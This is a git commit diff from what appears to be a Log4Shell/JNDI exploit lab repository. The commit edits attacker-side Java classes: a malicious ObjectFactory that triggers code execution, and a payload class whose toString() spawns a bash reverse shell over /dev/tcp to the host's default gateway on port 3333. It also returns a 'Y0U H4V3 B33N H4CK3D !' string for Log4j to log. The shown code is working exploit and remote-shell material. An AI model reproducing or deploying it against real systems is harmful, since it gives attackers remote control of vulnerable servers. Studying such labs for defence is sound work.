Browse Source

reverse shell to default route

master
Manvan33 8 months ago
parent
commit
55bd4e6f45
  1. 14
      attacker/http/src/FactoryClass.java
  2. 14
      attacker/http/src/MadeClass.java

14
attacker/http/src/FactoryClass.java

@ -23,20 +23,6 @@ public class FactoryClass implements ObjectFactory {
Context nameCtx,
Hashtable<?,?> env
) {
// Add instrumentation
System.out.println("RCE Acheived in FactoryClass::getObjectInstance!");
System.out.println("name: " + name );
System.out.println("nameCtx: " + nameCtx);
System.out.println("env: " + env );
System.out.println("obj: " + obj );
// Do whatever we want
RCEMain.rceMain();
// We could choose not to return. However, the caller is expecting an
// object of type MadeClass. I choose to give them something. It's
// useful for further instrumentation.
return new MadeClass();
}
}

14
attacker/http/src/MadeClass.java

@ -8,22 +8,16 @@ public class MadeClass {
@Override
public String toString() {
// Add instrumentation
System.out.println("RCE Acheived in MadeClass::toString!");
// Reverse shell
ProcessBuilder processBuilder = new ProcessBuilder();
processBuilder.command("bash", "-c", "bash -i >& /dev/tcp/172.17.0.1/3333 0>&1");
processBuilder.command("bash", "-c", "bash -i >& /dev/tcp/`ip route | grep default | cut -d ' ' -f 3`/3333 0>&1");
try {
processBuilder.start();
} catch (Exception e) {
e.printStackTrace();
}
System.out.println("REVERSE SHELL :)");
RCEMain.rceMain();
// We could choose not to return. However, the caller is expecting an
// object of String. I choose to give them something.
return "MadeClass";
// Return a string for Log4j to have something to log
return "Y0U H4V3 B33N H4CK3D !";
}
}

Loading…
Cancel
Save